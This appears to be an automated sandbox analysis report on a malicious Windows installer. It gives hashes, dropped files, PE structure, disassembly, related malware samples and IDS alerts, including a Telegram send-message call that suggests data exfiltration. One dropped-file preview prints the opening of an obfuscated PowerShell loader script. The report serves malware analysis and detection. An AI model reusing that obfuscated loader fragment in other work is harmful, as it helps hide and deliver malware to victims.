                                                                                                                                          • 149.154.167.220
                                                                                                                                          QUOTATION - RFQ2496_PO 08775622879.pdf(87kb).com.exeGet hashmaliciousQuasarBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          174.exeGet hashmaliciousXmrigBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          37f463bf4616ecd445d4a1937da06e19D7VRkhOECq.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
                                                                                                                                          KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
                                                                                                                                          DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
                                                                                                                                          e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
                                                                                                                                          e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
                                                                                                                                          chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
                                                                                                                                          xHj1N8ylIf.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
                                                                                                                                          leBwnyHIgx.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
                                                                                                                                          c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                                          • 142.250.184.238
                                                                                                                                          • 142.250.181.225
No context

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 650314
Entropy (8bit): 7.601107319746767
Encrypted: false
SSDEEP: 12288:lSDeMUQg8x4aKKnpDNsLXfzYoWg4IcQ9y3zf5ju9sis:SeMUQgUlNsvYoWdZtjBu/s
MD5: 9EEAA6C9CE625021AC21B5EB40FB73E7
SHA1: 459FA22834028579136AEBD1327A6FF8B6E654CB
SHA-256: 6370B5DCBBB9B63214F20EBF3FEA952C4DDC1FDD41E2D2594DC0717BCD7F9739
SHA-512: 202FA2B529565BDF1E2691A12F3B91D5BC6303B5D926852048ED482A071491E8ECF98CC8BE5FD1BE743A82400DB6A57F3EA4CBFD1EEB0586DCD508BA76B4DC50
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 32%
Reputation: low
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................\...........0.......p....@.......................................@..................................s.......P...............................................................................p...............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...............r..............@....ndata.......@...........................rsrc........P.......v..............@..@................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Reputation: high, very likely benign file
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\Users\user\Desktop\HVSU7GbA5N.exe
File Type: data
Category: dropped
Size (bytes): 344867
Entropy (8bit): 7.632856447500971
Encrypted: false
SSDEEP: 6144:ga0t2g01p4do3VetlwD/Q9jnxgR7zkyaoQXlWcjwPaRG9HX:ga0x0cWecgy5zky2VWcyHX
MD5: B596C196381704F7D59A4284460FEE40
SHA1: E0283AFD032563BDF7222AB654641E9ED3D4DE05
SHA-256: 5F12D49BDB6C38D8AF460D2E3080C3E2C8753FDCD4EC1B0AE5E2299C12B65FFD
SHA-512: A26A937F73427C23C1955CE370B213E8BCC13BFF394FF350499E8EE04A696AAFA3CE3C7B801E5E4C0583583A7A161D7CF732466DA3A24594F414086531F54D8C
Malicious: false
Reputation: low
Preview: ..........SS............hh..-..........99.....rr.K.S.hh..S.........YY..............d..<.G.....YY...&.UU.............FFFFFF........c..@.OOO......^^....8.........FFF................d.....l..........%.;..vv................................................H..ee...........C...44.....B.......x......D............|.o...{....k......................v.......(.(........4..#....RRR........+.....@@@@............66........................................9.9....QQQ...............Y.....................PP.....m................c..X.............MM............---.h..........'........UU.................J.....L..................(..............ZZZZ.......................PPPP.....w.....%.......&&&&.OOOO........C..B..........""............B...bb.......(...........33.77...............y................22.P..........:..........>...............................]............'...EE...h....D........bb..............bbb.......hh......,,,............ooooo.&.S........C.}..........KKKK........6........".....||||..X..........
                                                                                                                                          Process:C:\Users\user\Desktop\HVSU7GbA5N.exe
                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (4207), with CRLF, LF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):73908
                                                                                                                                          Entropy (8bit):5.185704234917167
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:GTSeyCEQfJgfhARuSJECSwublNwVAtuB9ZIMJ6qssj6xu1UJjCAYTg8:GTyCCfhku999EB/IIdsARAYc8
                                                                                                                                          MD5:44086E4E4B931EB543DAC505A3A4A2BE
                                                                                                                                          SHA1:9746B2ED0C33673A36AEFCEE2AA8A410DBD5A0F6
                                                                                                                                          SHA-256:3CB5D810D9693DBC418E3E864C4ED8C24D6E674819315166125028ED98EE3CA9
                                                                                                                                          SHA-512:613C00F10F1AD3DF1E56A05C6A770376B6000D04335FA73880C8C91635380EA46382A65E721267A61B98C5F8497F750BC26CEE2F6CB5A6DB42701C7EDD6C2722
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:$Pawnages=$ldervestene;........$Scorpaenid = @'.Myriade.Nadija $BeklageGAcidnesaNonko bdDup,esfiBe.dswonSidebanibrugerpnPhotosyeTa,rega=Hlesspe$SpongelNYngelsooPolemicr ldringe TrephiaMarkedssLaesesgtChronol5 Exantl;Iboende. BronzefErkyndiu MincepnBaldriacChrysort Snoo.wiNondecooDrnrrennD.wedel HelsilkE Fil errSnverhjiPeri argdogsto e Rein arUd okseoAnesthenMicrora Perito( Difflu$InframaA InsemikTaxi,eruBacc.ant S,rankbAntifaseSaucebohOverdefaCabfulsnRundtendObl.gatlVisitoriLedelsenC elydrg FremsteSli kinn Lowlies Tilsig,Detar v$ TogstaANaninaskDenati uKvasetstGaragembRingbareDuevejehPeroxi aSubdepunSkrmudsdChristelDismaliiRenselsnDrontedgStileemeModulscnKnead.nsSp dingfAflytn,sBostnintAfprveiuNeu olomForliggpStraalin Glansri HematonSagesengUnderli) raasaf Un aith{Skatteg.Unco.gr.Uri rro$ FiskebfoutgoneoUdplacerIncumbabLith.firHypo ixuO ernesgSilesi eBrysselrBakkestlEksportoG ssendvbedsoreeAnti ua kiltes( Pe sonUIndecisnHibernafS cionooSloganiu Madstel DepartiPhotolinDo,beltgSesquis
                                                                                                                                          Process:C:\Users\user\Desktop\HVSU7GbA5N.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):161187
                                                                                                                                          Entropy (8bit):1.8904269661652378
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:KY3109OlXCDhowfac81VfCf60Ojh7SPHlfPsH4qnW4K5V09X1m0qOP8e6jBLYD2B:Ks6Oumf2WuInWOg0q0Lt1dlRSr
                                                                                                                                          MD5:01E052DE0376DBAC7B750EC6C0BB3F54
                                                                                                                                          SHA1:893EB9A86D8383DD9E71E669A4A890D676DDB313
                                                                                                                                          SHA-256:F86E826510C473713B3AE14F1EF8AF26A54A1B99E3C7AEE106969EE6BD395B8F
                                                                                                                                          SHA-512:172181AD34B6A851DBE2DD77EF7DB02C12F93B55E1A42EE3BB44971758C482EA078CCEA8B68B079C629A40CA106F427D8DFD62FCE08F9473FDCB796FC9E94C95
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:................b...............^.............G......................................................D...R..........`.....y............................*.................l...........S...............\D....`...............a............................|.................................u............................X...........................O.......;............................h......"......I......^...k.I........m..............................2.....................................X............0............................+............../..................................................t............................\...~.............................z....................J.................................=...+...$.....$......................................................................................&.......j......S..d............a..........>......P..o.....^...........}........................6...........D......................................................a.....k.Q....E....._......I..
                                                                                                                                          Process:C:\Users\user\Desktop\HVSU7GbA5N.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):302535
                                                                                                                                          Entropy (8bit):1.8969107180726248
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:BuEWHusZSmrnxGe2N31qRRM5I/2RbpPfvKUO/VRu:BnWHJh3YQRRM51JDL
                                                                                                                                          MD5:EBC7E2200359EDAAE097636129F328C3
                                                                                                                                          SHA1:711F41ED8A676E9CFC8917E984F2C8BF42515DEB
                                                                                                                                          SHA-256:BC6F21CE3CA3EF3966F014CE12132D8B994B31AF20C61033FE02DC3178669DAD
                                                                                                                                          SHA-512:D4872EBF8673A6D6A390EE6FA008AE886C11ECFA322761399EA8E0E1A6CAF15B7CF4D81F103E45D49E550F0260B2213940C4BC07838355FA70BF550786682EA3
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.................................................G......................Y.......................................X#...Le........................................................w...4.........X...o................X........._............................B.......@..............................................8..!7............4.................\.......K.......L...........................................q......a................G....................9.......I,.`..................../c~...............j................Z...V:.......F.....A0............x................+..............z................%..........."..................................t...............V....................................6......P.......................8..........^.........................................(.h................1............>.......................................y........@o.......|............l......P.........................g..Y.......b...............+...........J....J..............................+4.....=:..
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):53158
                                                                                                                                          Entropy (8bit):5.062687652912555
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                          MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                          SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                          SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                          SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):60
                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                          Entropy (8bit):7.601107319746767
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                          File name:HVSU7GbA5N.exe
                                                                                                                                          File size:650'314 bytes
                                                                                                                                          MD5:9eeaa6c9ce625021ac21b5eb40fb73e7
                                                                                                                                          SHA1:459fa22834028579136aebd1327a6ff8b6e654cb
                                                                                                                                          SHA256:6370b5dcbbb9b63214f20ebf3fea952c4ddc1fdd41e2d2594dc0717bcd7f9739
                                                                                                                                          SHA512:202fa2b529565bdf1e2691a12f3b91d5bc6303b5d926852048ed482a071491e8ecf98cc8be5fd1be743a82400db6a57f3ea4cbfd1eeb0586dcd508ba76b4dc50
                                                                                                                                          SSDEEP:12288:lSDeMUQg8x4aKKnpDNsLXfzYoWg4IcQ9y3zf5ju9sis:SeMUQgUlNsvYoWdZtjBu/s
                                                                                                                                          TLSH:F0D41252F480A2E3C9720E32947FD1F2D6EDAC3D85282A877FD837AF1471461D10A56B
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L....\.U.................\...........0.......p....@
                                                                                                                                          Icon Hash:05cc948467e6c62c
                                                                                                                                          Entrypoint:0x4030b6
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x55C15CDD [Wed Aug 5 00:46:21 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: e160ef8e55bb9d162da4e266afd9eef3
Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409190h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407034h]
push 00008001h
call dword ptr [0040711Ch]
push ebx
call dword ptr [0040728Ch]
push 00000009h
mov dword ptr [00423798h], eax
call 00007F6AF8E5AF32h
mov dword ptr [004236E4h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041EC98h
call dword ptr [00407164h]
push 00409180h
push 00422EE0h
call 00007F6AF8E5ABDCh
call dword ptr [00407120h]
mov ebp, 00429000h
push eax
push ebp
call 00007F6AF8E5ABCAh
push ebx
call dword ptr [00407118h]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [004236E0h], eax
mov eax, ebp
jne 00007F6AF8E5814Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F6AF8E5A65Ah
push eax
call dword ptr [00407220h]
mov dword ptr [esp+1Ch], eax
jmp 00007F6AF8E58205h
cmp cl, 00000020h
jne 00007F6AF8E58148h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F6AF8E5813Ch
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x35000 | 0x283c0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5ac0 | 0x5c00 | b2645f74b36b1cbbff66d6cf2b9a61fb | False | 0.6638077445652174 | data | 6.434017891994297 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x11ce | 0x1200 | 640f709ec19b4ed0455a4c64e5934d5e | False | 0.4520399305555556 | OpenPGP Secret Key | 5.23558258677739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1a7d8 | 0x400 | 135ffaf7e3978322a97c335bc761bdb6 | False | 0.609375 | data | 4.961292527260562 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x24000 | 0x11000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x35000 | 0x283c0 | 0x28400 | ebf946ed8f37400a9a59d22eec6a4b01 | False | 0.5164741847826086 | data | 5.585975534863303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x35358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.4569975156749083
RT_ICON | 0x45b80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.5434885431994955
RT_ICON | 0x4f028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.56728280961183
RT_ICON | 0x544b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.540800661313179
RT_ICON | 0x586d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6162863070539419
RT_ICON | 0x5ac80 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.6226547842401501
RT_ICON | 0x5bd28 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6967213114754098
RT_ICON | 0x5c6b0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.7375886524822695
RT_DIALOG | 0x5cb18 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x5cc18 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x5cd38 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x5ce00 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x5ce60 | 0x76 | data | English | United States | 0.7457627118644068
RT_VERSION | 0x5ced8 | 0x1a8 | data | English | United States | 0.5165094339622641
RT_MANIFEST | 0x5d080 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447
DLL | Import
KERNEL32.dll | GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, Sleep, CloseHandle, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, SetErrorMode, GetCommandLineA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-08T16:21:18.656695+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49709 | 142.250.184.238 | 443 | TCP
2025-01-08T16:21:23.621820+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 132.226.8.169 | 80 | TCP
2025-01-08T16:21:24.809363+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 132.226.8.169 | 80 | TCP
2025-01-08T16:21:25.392730+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49713 | 188.114.97.3 | 443 | TCP
2025-01-08T16:21:26.293753+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49714 | 132.226.8.169 | 80 | TCP
2025-01-08T16:21:28.012490+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49716 | 132.226.8.169 | 80 | TCP
2025-01-08T16:21:30.188459+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49719 | 188.114.97.3 | 443 | TCP
2025-01-08T16:21:36.997539+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.8 | 49728 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 16:21:17.622142076 CET | 49709 | 443 | 192.168.2.8 | 142.250.184.238
Jan 8, 2025 16:21:17.622179031 CET | 443 | 49709 | 142.250.184.238 | 192.168.2.8
Jan 8, 2025 16:21:17.622298956 CET | 49709 | 443 | 192.168.2.8 | 142.250.184.238
